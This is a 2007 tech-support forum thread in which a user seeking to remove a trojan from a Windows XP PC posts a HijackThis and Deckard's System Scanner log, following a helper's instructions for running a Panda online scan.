    • Once you are on the Panda site click the Scan your PC now button
    • A new window will open...click the Check Now button
    • Enter your Country
    • Enter your State/Province
    • Enter your e-mail address and click send
    • Select either Home User or Company
    • Select the appropriate Yes or No to receiving marketing information
    • Click the Free Online Scan button
    • If it wants to install an ActiveX component allow it
    • It will start downloading the files it requires for the scan (Note: It may take a couple of minutes)
    • When download is complete, click on My Computer to start the scan
    • When the scan completes, if anything malicious is detected, click the See Report button, then Save Report and save it to a convenient location.
    Post the contents of the ActiveScan report.

  4. 2007/09/30
    Kile

    How to remove Trojan.NSIS.Voter.a

    Deckard's System Scanner v20070905.67
    Run by Clement on 2007-09-30 08:51:11
    Computer is in Normal Mode.
    --------------------------------------------------------------------------------

    -- System Restore --------------------------------------------------------------

    Successfully created a Deckard's System Scanner Restore Point.


    -- Last 2 Restore Point(s) --
    2: 2007-09-30 05:51:28 UTC - RP2 - Deckard's System Scanner Restore Point
    1: 2007-09-29 12:34:40 UTC - RP1 - System Checkpoint


    Backed up registry hives.
    Performed disk cleanup.

    Total Physical Memory: 247 MiB (512 MiB recommended).


    -- HijackThis (run as Clement.exe) ---------------------------------------------

    Logfile of Trend Micro HijackThis v2.0.2
    Scan saved at 8:52:57 AM, on 9/30/2007
    Platform: Windows XP SP2 (WinNT 5.01.2600)
    MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
    Boot mode: Normal

    Running processes:
    C:\WINDOWS\System32\smss.exe
    C:\WINDOWS\system32\winlogon.exe
    C:\WINDOWS\system32\services.exe
    C:\WINDOWS\system32\lsass.exe
    C:\WINDOWS\system32\svchost.exe
    C:\WINDOWS\System32\svchost.exe
    C:\WINDOWS\system32\spoolsv.exe
    C:\Program Files\Comodo\CBOClean\BOCORE.exe
    C:\Program Files\Comodo\Firewall\cmdagent.exe
    C:\Program Files\Nero\Nero 7\InCD\InCDsrv.exe
    C:\Program Files\Common Files\LightScribe\LSSrvc.exe
    C:\WINDOWS\system32\lvhidsvc.exe
    C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
    C:\WINDOWS\Explorer.EXE
    C:\Program Files\Nero\Nero 7\InCD\InCD.exe
    C:\WINDOWS\system32\igfxtray.exe
    C:\WINDOWS\system32\hkcmd.exe
    C:\WINDOWS\system32\igfxpers.exe
    C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
    C:\Program Files\Adobe\Acrobat 7.0\Distillr\Acrotray.exe
    C:\Program Files\Winamp\winampa.exe
    C:\PROGRA~1\Comodo\CBOClean\BOC425.exe
    C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe
    C:\Program Files\Common Files\Ahead\Lib\NMIndexStoreSvr.exe
    C:\Program Files\TVR\TVR\RecSche.EXE
    C:\Program Files\Common Files\Ahead\Lib\NMIndexingService.exe
    C:\Program Files\Winamp\winamp.exe
    C:\Program Files\Mozilla Firefox\firefox.exe
    C:\WINDOWS\system32\wuauclt.exe
    C:\WINDOWS\system32\wuauclt.exe
    C:\Documents and Settings\Clement\Desktop\dss.exe
    C:\PROGRA~1\TRENDM~1\HIJACK~1\Clement.exe

    R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = www.microsoft.com
    R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Hacked by Godzilla
    O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
    O2 - BHO: AcroIEToolbarHelper Class - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll
    O3 - Toolbar: Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll
    O4 - HKLM\..\Run: [NeroFilterCheck] C:\Program Files\Common Files\Ahead\Lib\NeroCheck.exe
    O4 - HKLM\..\Run: [InCD] C:\Program Files\Nero\Nero 7\InCD\InCD.exe
    O4 - HKLM\..\Run: [igfxtray] C:\WINDOWS\system32\igfxtray.exe
    O4 - HKLM\..\Run: [igfxhkcmd] C:\WINDOWS\system32\hkcmd.exe
    O4 - HKLM\..\Run: [igfxpers] C:\WINDOWS\system32\igfxpers.exe
    O4 - HKLM\..\Run: [RemoteControl] "C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe "
    O4 - HKLM\..\Run: [Acrobat Assistant 7.0] "C:\Program Files\Adobe\Acrobat 7.0\Distillr\Acrotray.exe "
    O4 - HKLM\..\Run: [WinampAgent] C:\Program Files\Winamp\winampa.exe
    O4 - HKLM\..\Run: [BOC-425] C:\PROGRA~1\Comodo\CBOClean\BOC425.exe
    O4 - HKLM\..\RunServices: [LvHidSvc] C:\WINDOWS\system32\lvhidsvc.exe
    O4 - HKCU\..\Run: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe "
    O4 - HKCU\..\Run: [avpa] C:\WINDOWS\system32\avpo.exe
    O4 - HKCU\..\Run: [] C:\WINDOWS\system32\drivers\scan
    O4 - Startup: scan.lnk = ?
    O4 - Global Startup: TVR Schedule.lnk = ?
    O8 - Extra context menu item: Convert link target to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
    O8 - Extra context menu item: Convert link target to existing PDF - res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
    O8 - Extra context menu item: Convert selected links to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
    O8 - Extra context menu item: Convert selected links to existing PDF - res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
    O8 - Extra context menu item: Convert selection to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
    O8 - Extra context menu item: Convert selection to existing PDF - res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
    O8 - Extra context menu item: Convert to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
    O8 - Extra context menu item: Convert to existing PDF - res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
    O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
    O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
    O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
    O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
    O17 - HKLM\System\CCS\Services\Tcpip\..\{1A62DFC3-A742-4EB8-8970-82A7B23D3E65}: NameServer = 196.46.100.2 196.46.104.2
    O17 - HKLM\System\CS1\Services\Tcpip\..\{1A62DFC3-A742-4EB8-8970-82A7B23D3E65}: NameServer = 196.46.100.2 196.46.104.2
    O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
    O23 - Service: BOCore - COMODO - C:\Program Files\Comodo\CBOClean\BOCORE.exe
    O23 - Service: Comodo Application Agent (CmdAgent) - COMODO - C:\Program Files\Comodo\Firewall\cmdagent.exe
    O23 - Service: InCD Helper (InCDsrv) - Nero AG - C:\Program Files\Nero\Nero 7\InCD\InCDsrv.exe
    O23 - Service: LightScribeService Direct Disc Labeling Service (LightScribeService) - Hewlett-Packard Company - C:\Program Files\Common Files\LightScribe\LSSrvc.exe
    O23 - Service: Lifeview HID Remote Controller Service (lvhidsvc) - Animation Technologies Inc. - C:\WINDOWS\system32\lvhidsvc.exe
    O23 - Service: NMIndexingService - Nero AG - C:\Program Files\Common Files\Ahead\Lib\NMIndexingService.exe

    --
    End of file - 5970 bytes

    -- HijackThis Fixed Entries (C:\PROGRA~1\TRENDM~1\HIJACK~1\backups\) -----------

    backup-20070929-125231-619 O4 - Startup: K'S TAX INVOICE.lnk = ?
    backup-20070929-135250-232 O4 - Startup: scan.lnk = ?
    backup-20070929-135250-274 O4 - Startup: K'S TAX INVOICE (KINYEREZI.lnk = ?
    backup-20070929-135250-285 O4 - Startup: 2007-09 (Sep).lnk = ?
    backup-20070929-135250-287 O4 - Startup: scan0002.lnk = ?
    backup-20070929-135250-364 O4 - Startup: K'S TAX INVOICE.lnk = ?
    backup-20070929-135250-368 O4 - HKLM\..\Run: [MS32DLL] C:\WINDOWS\MS32DLL.dll.vbs
    backup-20070929-135250-460 O4 - Startup: autorun.lnk = ?
    backup-20070929-135250-563 O4 - Startup: ldupver.lnk = ?

    -- File Associations -----------------------------------------------------------

    All associations okay.


    -- Drivers: 0-Boot, 1-System, 2-Auto, 3-Demand, 4-Disabled ---------------------

    R3 LVCap138 (TV Card WDM Video Capture) - c:\windows\system32\drivers\lvcap138.sys <Not Verified; Animation Technologies Inc.; Lifeview (R) LR138 TV Card>
    R3 lvtuner (TV Card TV Tuner) - c:\windows\system32\drivers\lvtuner.sys <Not Verified; Animation Technologies Inc.; Lifeview (R) TV Card>
    R3 umpusbxp (VCP Serial Port Driver) - c:\windows\system32\drivers\umpusbxp.sys <Not Verified; Texas Instruments; Texas Instruments UMP Device Driver (TUSB5052, TUSB3410)>


    -- Services: 0-Boot, 1-System, 2-Auto, 3-Demand, 4-Disabled --------------------

    R2 BOCore - c:\program files\comodo\cboclean\bocore.exe <Not Verified; COMODO; COMODO BOClean - Anti-Malware>
    R2 lvhidsvc (Lifeview HID Remote Controller Service) - c:\windows\system32\lvhidsvc.exe <Not Verified; Animation Technologies Inc.; Lifeview (R) TV Card>
    R3 NMIndexingService - "c:\program files\common files\ahead\lib\nmindexingservice.exe" <Not Verified; Nero AG; Nero Home>


    -- Device Manager: Disabled ----------------------------------------------------

    Class GUID: {4D36E972-E325-11CE-BFC1-08002BE10318}
    Description: Realtek RTL8139/810x Family Fast Ethernet NIC
    Device ID: PCI\VEN_10EC&DEV_8139&SUBSYS_81391849&REV_10\4&2E98101C&0&28F0
    Manufacturer: Realtek Semiconductor Corp.
    Name: Realtek RTL8139/810x Family Fast Ethernet NIC
    PNP Device ID: PCI\VEN_10EC&DEV_8139&SUBSYS_81391849&REV_10\4&2E98101C&0&28F0
    Service: RTL8023xp


    -- Files created between 2007-08-30 and 2007-09-30 -----------------------------

    2007-09-30 08:49:30 0 d-------- C:\WINDOWS\LastGood
    2007-09-29 14:04:45 0 d-------- C:\Documents and Settings\Mama\Application Data\Adobe
    2007-09-29 14:04:25 0 d-------- C:\Documents and Settings\Mama\Application Data\AVG7
    2007-09-29 14:02:30 0 d-------- C:\Documents and Settings\Mama\Application Data\Identities
    2007-09-29 14:01:41 0 d---s---- C:\Documents and Settings\Mama\Application Data\Microsoft
    2007-09-29 14:01:40 0 d--h----- C:\Documents and Settings\Mama\Templates
    2007-09-29 14:01:40 0 dr------- C:\Documents and Settings\Mama\Start Menu
    2007-09-29 14:01:40 0 dr-h----- C:\Documents and Settings\Mama\SendTo
    2007-09-29 14:01:40 0 dr-h----- C:\Documents and Settings\Mama\Recent
    2007-09-29 14:01:40 0 d--h----- C:\Documents and Settings\Mama\PrintHood
    2007-09-29 14:01:40 524288 --ah----- C:\Documents and Settings\Mama\NTUSER.DAT
    2007-09-29 14:01:40 0 d--h----- C:\Documents and Settings\Mama\NetHood
    2007-09-29 14:01:40 0 dr------- C:\Documents and Settings\Mama\My Documents
    2007-09-29 14:01:40 0 d--h----- C:\Documents and Settings\Mama\Local Settings
    2007-09-29 14:01:40 0 dr------- C:\Documents and Settings\Mama\Favorites
    2007-09-29 14:01:40 0 d-------- C:\Documents and Settings\Mama\Desktop
    2007-09-29 14:01:40 0 d---s---- C:\Documents and Settings\Mama\Cookies
    2007-09-29 14:01:40 0 dr-h----- C:\Documents and Settings\Mama\Application Data
    2007-09-29 12:37:20 2226 --a------ C:\WINDOWS\system32\tmp.reg
    2007-09-29 12:30:06 0 d-------- C:\spoolerlogs
    2007-09-29 12:29:10 0 d-------- C:\Program Files\Trend Micro
    2007-09-29 11:58:46 0 d-a------ C:\Documents and Settings\All Users\Application Data\TEMP
    2007-09-29 11:58:14 0 d-------- C:\Documents and Settings\Clement\Application Data\PC Tools
    2007-09-29 10:37:17 0 dr-h----- C:\$VAULT$.AVG
    2007-09-29 10:16:12 0 d-------- C:\Documents and Settings\Clement\Application Data\AVG7
    2007-09-29 10:16:01 0 d-------- C:\Documents and Settings\LocalService\Application Data\AVG7
    2007-09-29 10:14:47 0 d-------- C:\Documents and Settings\All Users\Application Data\avg7
    2007-09-29 08:52:35 0 dr------- C:\Documents and Settings\LocalService\Favorites
    2007-09-29 08:45:43 67643 -r-hs---- C:\ntde1ect.com
    2007-09-29 08:31:00 13824 -r-hs---- C:\WINDOWS\system32\avpo0.dll
    2007-09-29 08:31:00 67643 -r-hs---- C:\WINDOWS\system32\avpo.exe
    2007-09-29 08:24:56 0 d-------- C:\Documents and Settings\All Users\Application Data\McAfee.com
    2007-09-29 07:50:49 235008 --a------ C:\WINDOWS\UNBOC.EXE <Not Verified; COMODO; COMODO BOClean - Anti-Malware>
    2007-09-29 07:50:48 208896 --a------ C:\WINDOWS\CMDLIC.DLL <Not Verified; COMODO; COMODO BOClean - AntiMalware>
    2007-09-29 07:50:42 0 d-------- C:\Documents and Settings\All Users\Application Data\BOC425
    2007-09-28 06:11:57 0 d-------- C:\WINDOWS\system32\PreInstall
    2007-09-28 04:58:02 0 d--h----- C:\WINDOWS\$hf_mig$
    2007-09-27 17:29:27 0 d-------- C:\Program Files\SpywareBlaster
    2007-09-27 17:27:27 0 d-------- C:\Documents and Settings\Clement\Application Data\Comodo
    2007-09-27 17:27:25 0 d-------- C:\Documents and Settings\All Users\Application Data\Comodo
    2007-09-27 17:01:07 0 d-------- C:\Program Files\Comodo
    2007-09-25 16:49:23 0 d-------- C:\Documents and Settings\Clement\Application Data\AdobeUM
    2007-09-24 18:15:04 0 d-------- C:\Documents and Settings\All Users\Application Data\Yahoo!
    2007-09-24 18:10:29 0 d-------- C:\Program Files\Yahoo!
    2007-09-24 09:09:08 0 d-------- C:\Documents and Settings\Clement\Application Data\Macromedia
    2007-09-24 09:08:40 1156 --a------ C:\WINDOWS\mozver.dat
    2007-09-23 17:17:40 0 d---s---- C:\Documents and Settings\Clement\UserData
    2007-09-23 11:31:46 0 d-------- C:\Documents and Settings\Clement\Application Data\Skype
    2007-09-23 11:31:34 0 d-------- C:\Program Files\Skype
    2007-09-23 08:58:14 0 d-------- C:\Downloads and Utilities 2007
    2007-09-21 06:03:54 0 d-------- C:\Documents and Settings\NetworkService\Start Menu
    2007-09-21 06:00:41 0 d-------- C:\WINDOWS\system32\SoftwareDistribution
    2007-09-19 20:39:24 0 d--hs---- C:\WINDOWS\Installer
    2007-09-19 20:39:22 0 d-------- C:\Program Files\Common Files\ODBC
    2007-09-19 20:39:16 0 dr------- C:\Program Files
    2007-09-19 20:39:16 0 d-------- C:\Program Files\Common Files
    2007-09-19 20:39:16 0 d-------- C:\Program Files\Common Files\SpeechEngines
    2007-09-19 20:38:44 0 d--h----- C:\Documents and Settings\Default User\Templates
    2007-09-19 20:38:44 0 dr------- C:\Documents and Settings\Default User\Start Menu
    2007-09-19 20:38:44 0 dr-h----- C:\Documents and Settings\Default User\SendTo
    2007-09-19 20:38:44 0 d--h----- C:\Documents and Settings\Default User\Recent
    2007-09-19 20:38:44 0 d--h----- C:\Documents and Settings\Default User\PrintHood
    2007-09-19 20:38:44 0 d--h----- C:\Documents and Settings\Default User\NetHood
    2007-09-19 20:38:44 0 d-------- C:\Documents and Settings\Default User\My Documents
    2007-09-19 20:38:44 0 dr-h----- C:\Documents and Settings\Default User\Local Settings
    2007-09-19 20:38:44 0 d-------- C:\Documents and Settings\Default User\Favorites
    2007-09-19 20:38:44 0 d-------- C:\Documents and Settings\Default User\Desktop
    2007-09-19 20:38:44 0 d---s---- C:\Documents and Settings\Default User\Cookies
    2007-09-19 20:38:44 0 d--h----- C:\Documents and Settings\All Users\Templates
    2007-09-19 20:38:44 0 dr------- C:\Documents and Settings\All Users\Start Menu
    2007-09-19 20:38:44 0 d-------- C:\Documents and Settings\All Users\Favorites
    2007-09-19 20:38:44 0 dr------- C:\Documents and Settings\All Users\Documents
    2007-09-19 20:38:44 0 d-------- C:\Documents and Settings\All Users\Desktop
    2007-09-19 20:36:43 0 d-------- C:\WINDOWS\system32\CatRoot2
    2007-09-19 20:36:43 0 d-------- C:\WINDOWS\system32\CatRoot
    2007-09-19 20:36:36 0 dr-h----- C:\Documents and Settings\Default User\Application Data
    2007-09-19 20:36:36 0 d---s---- C:\Documents and Settings\Default User\Application Data\Microsoft
    2007-09-19 20:36:35 0 dr-h----- C:\Documents and Settings\All Users\Application Data
    2007-09-19 20:36:35 0 d---s---- C:\Documents and Settings\All Users\Application Data\Microsoft
    2007-09-19 20:36:07 0 d-------- C:\Documents and Settings
    2007-09-19 20:33:12 0 d--hs---- C:\System Volume Information
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\WinSxS
    2007-09-19 20:19:03 0 dr------- C:\WINDOWS\Web
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\twain_32
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\wins
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\wbem
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\usmt
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\spool
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\ShellExt
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\Setup
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\ras
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\oobe
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\npp
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\mui
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\inetsrv
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\IME
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\icsxml
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\ias
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\export
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\drivers
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\drivers\etc
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\drivers\disdn
    2007-09-19 20:19:03 0 dr-hs--c- C:\WINDOWS\system32\dllcache
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\dhcp
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\config
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\3com_dmi
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\3076
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\2052
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\1054
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\1042
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\1041
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\1037
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\1033
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\1031
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\1028
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\1025
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\security
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\Resources
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\repair
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\Provisioning
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\PeerNet
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\pchealth
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\mui
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\msapps
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\msagent
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\Media
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\java
    2007-09-19 20:19:03 0 d--h----- C:\WINDOWS\inf
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\ime
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\Help
    2007-09-19 20:19:03 0 dr--s---- C:\WINDOWS\Fonts
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\ehome
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\Driver Cache
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\Debug
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\Cursors
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\Connection Wizard
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\Config
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\AppPatch
    2007-09-19 20:19:03 0 d-------- C:\WINDOWS\addins
    2007-09-19 19:45:01 0 --a------ C:\WINDOWS\nsreg.dat
    2007-09-19 19:44:56 0 d-------- C:\Documents and Settings\Clement\Application Data\Mozilla
    2007-09-19 19:42:27 0 d-------- C:\Program Files\Winamp
    2007-09-19 19:41:25 0 d-------- C:\Program Files\Mozilla Thunderbird
    2007-09-19 19:24:29 76768 -ra------ C:\WINDOWS\system32\drivers\umpusbxp.sys <Not Verified; Texas Instruments; Texas Instruments UMP Device Driver (TUSB5052, TUSB3410)>
    2007-09-19 19:24:29 0 d-------- C:\HUAWEI
    2007-09-19 19:14:04 14464 -ra------ C:\WINDOWS\system32\drivers\lvtuner.sys <Not Verified; Animation Technologies Inc.; Lifeview (R) TV Card>
    2007-09-19 19:13:35 110592 -ra------ C:\WINDOWS\system32\Prop7134.dll <Not Verified; Philips Semiconductors; Philips Prop7134>
    2007-09-19 19:13:35 110592 -ra------ C:\WINDOWS\system32\34com.dll <Not Verified; Philips Semiconductors; VampCOM Module>
    2007-09-19 19:13:34 73728 -ra------ C:\WINDOWS\system32\34TvCtrl.dll <Not Verified; Philips Semiconductors; 34TvCtrl>
    2007-09-19 19:13:34 23552 -ra------ C:\WINDOWS\system32\34ds.dll <Not Verified; Philips Semiconductors; 34ds>
    2007-09-19 19:13:34 282624 -ra------ C:\WINDOWS\system32\34dlg2.dll <Not Verified; Philips Semiconductors; dialog3 Dynamic Link Library>
    2007-09-19 19:13:34 94208 -ra------ C:\WINDOWS\system32\34dialog.dll <Not Verified; Philips Semiconductors; 34dialog>
    2007-09-19 19:13:34 77824 -ra------ C:\WINDOWS\system32\34dd.dll <Not Verified; Philips Semiconductors; 34dd>
    2007-09-19 19:13:33 308096 -ra------ C:\WINDOWS\system32\drivers\lvcap138.sys <Not Verified; Animation Technologies Inc.; Lifeview (R) LR138 TV Card>
    2007-09-19 19:13:33 8192 -ra------ C:\WINDOWS\system32\34pciurd.dll <Not Verified; Philips Semiconductors; Philips 34PCIurd>
    2007-09-19 19:13:33 6144 -ra------ C:\WINDOWS\system32\34i2curd.dll <Not Verified; Philips Semiconductors; Philips 34I2Curd>
    2007-09-19 19:13:33 135168 -ra------ C:\WINDOWS\system32\34api.dll <Not Verified; Philips Semiconductors; UM proxy>
    2007-09-19 19:11:48 0 d-------- C:\Program Files\TVR
    2007-09-19 19:07:58 0 d-------- C:\Documents and Settings\All Users\Application Data\Adobe Systems
    2007-09-19 19:07:25 0 d-------- C:\Documents and Settings\Clement\Application Data\Adobe
    2007-09-19 19:07:24 0 d-------- C:\Program Files\Common Files\Adobe Systems Shared
    2007-09-19 19:03:29 0 d-------- C:\Program Files\Common Files\Adobe
    2007-09-19 19:01:19 0 d-------- C:\Documents and Settings\All Users\Application Data\Adobe
    2007-09-19 18:56:17 0 d-------- C:\Documents and Settings\All Users\Application Data\LightScribe
    2007-09-19 18:55:16 0 d-------- C:\Program Files\CyberLink
    2007-09-19 18:41:03 266240 --a------ C:\WINDOWS\CMIUninstall.exe <Not Verified; ; GeneralUninstall Application>
    2007-09-19 18:41:03 225280 --a------ C:\WINDOWS\CmiRmRedundDir.exe <Not Verified; ; CmiRmRedundDir Application>
    2007-09-19 18:41:02 28672 --a------ C:\WINDOWS\CMIRmDriver.dll
    2007-09-19 18:41:02 0 d-------- C:\Program Files\C-Media 3D Audio
    2007-09-19 18:40:19 0 d-------- C:\WINDOWS\OPTIONS
    2007-09-19 18:40:19 0 d--h----- C:\Program Files\InstallShield Installation Information
    2007-09-19 18:40:06 0 d-------- C:\Program Files\Common Files\InstallShield
    2007-09-19 18:39:16 0 d-------- C:\WINDOWS\system32\ReinstallBackups
    2007-09-19 18:39:11 0 d-------- C:\Program Files\Intel
    2007-09-19 18:38:55 5824 --a------ C:\WINDOWS\system32\drivers\ASUSHWIO.SYS
    2007-09-19 18:37:35 0 d-------- C:\Program Files\Common Files\LightScribe
    2007-09-19 18:29:31 0 d-------- C:\Documents and Settings\Clement\Application Data\Ahead
    2007-09-19 18:26:31 0 d-------- C:\Documents and Settings\All Users\Application Data\Nero
    2007-09-19 18:26:30 0 d-------- C:\Program Files\Nero
    2007-09-19 18:26:30 0 d-------- C:\Program Files\Common Files\Ahead
    2007-09-19 18:24:59 0 d-------- C:\WINDOWS\RegisteredPackages
    2007-09-19 18:16:42 0 d-------- C:\Program Files\Common Files\L&H
    2007-09-19 18:16:06 0 d-------- C:\Program Files\Microsoft.NET
    2007-09-19 18:15:35 0 d-------- C:\Program Files\Microsoft ActiveSync
    2007-09-19 18:13:41 0 d-------- C:\Program Files\Microsoft Works
    2007-09-19 18:12:41 0 d-------- C:\WINDOWS\SHELLNEW
    2007-09-19 18:08:57 0 dr-h----- C:\MSOCache
    2007-09-19 18:07:08 0 d-------- C:\Documents and Settings\Clement\Application Data\Identities
    2007-09-19 18:06:40 0 d--h----- C:\Documents and Settings\Clement\Templates
    2007-09-19 18:06:40 0 dr------- C:\Documents and Settings\Clement\Start Menu
    2007-09-19 18:06:40 0 dr-h----- C:\Documents and Settings\Clement\SendTo
    2007-09-19 18:06:40 0 dr-h----- C:\Documents and Settings\Clement\Recent
    2007-09-19 18:06:40 0 d--h----- C:\Documents and Settings\Clement\PrintHood
    2007-09-19 18:06:40 1835008 --ah----- C:\Documents and Settings\Clement\NTUSER.DAT
    2007-09-19 18:06:40 0 d--h----- C:\Documents and Settings\Clement\NetHood
    2007-09-19 18:06:40 0 dr------- C:\Documents and Settings\Clement\My Documents
    2007-09-19 18:06:40 0 d--h----- C:\Documents and Settings\Clement\Local Settings
    2007-09-19 18:06:40 0 dr------- C:\Documents and Settings\Clement\Favorites
    2007-09-19 18:06:40 0 d-------- C:\Documents and Settings\Clement\Desktop
    2007-09-19 18:06:40 0 d---s---- C:\Documents and Settings\Clement\Cookies
    2007-09-19 18:06:40 0 dr-h----- C:\Documents and Settings\Clement\Application Data
    2007-09-19 18:05:20 0 d-------- C:\WINDOWS\SoftwareDistribution
    2007-09-19 18:05:14 0 d-------- C:\WINDOWS\Prefetch
    2007-09-19 18:05:13 0 d---s---- C:\WINDOWS\system32\Microsoft
    2007-09-19 18:05:11 229376 --a------ C:\Documents and Settings\LocalService\NTUSER.DAT
    2007-09-19 18:05:11 0 d--h----- C:\Documents and Settings\LocalService\Local Settings
    2007-09-19 18:05:11 0 d---s---- C:\Documents and Settings\LocalService\Cookies
    2007-09-19 18:05:11 0 d-------- C:\Documents and Settings\LocalService\Application Data
    2007-09-19 18:05:11 0 d---s---- C:\Documents and Settings\LocalService\Application Data\Microsoft
    2007-09-19 18:04:46 262144 --ah----- C:\Documents and Settings\NetworkService\NTUSER.DAT
    2007-09-19 18:04:46 0 d--h----- C:\Documents and Settings\NetworkService\Local Settings
    2007-09-19 18:04:46 0 d---s---- C:\Documents and Settings\NetworkService\Cookies
    2007-09-19 18:04:46 0 d-------- C:\Documents and Settings\NetworkService\Application Data
    2007-09-19 18:04:46 0 d---s---- C:\Documents and Settings\NetworkService\Application Data\Microsoft
    2007-09-19 17:58:04 0 d-------- C:\WINDOWS\system32\xircom
    2007-09-19 17:58:04 0 d-------- C:\Program Files\microsoft frontpage
    2007-09-19 17:57:42 225280 ---h----- C:\Documents and Settings\Default User\NTUSER.DAT
    2007-09-19 17:57:24 0 -rahs---- C:\MSDOS.SYS
    2007-09-19 17:57:24 0 -rahs---- C:\IO.SYS
    2007-09-19 17:57:24 0 --a------ C:\CONFIG.SYS
    2007-09-19 17:57:24 0 --a------ C:\AUTOEXEC.BAT
    2007-09-19 17:55:22 0 d--hs---- C:\Documents and Settings\All Users\DRM
    2007-09-19 17:54:56 0 dr------- C:\WINDOWS\Offline Web Pages
    2007-09-19 17:54:56 0 d---s---- C:\WINDOWS\Downloaded Program Files
    2007-09-19 17:54:35 0 d--h----- C:\Program Files\WindowsUpdate
    2007-09-19 17:54:04 0 d-------- C:\WINDOWS\system32\DirectX
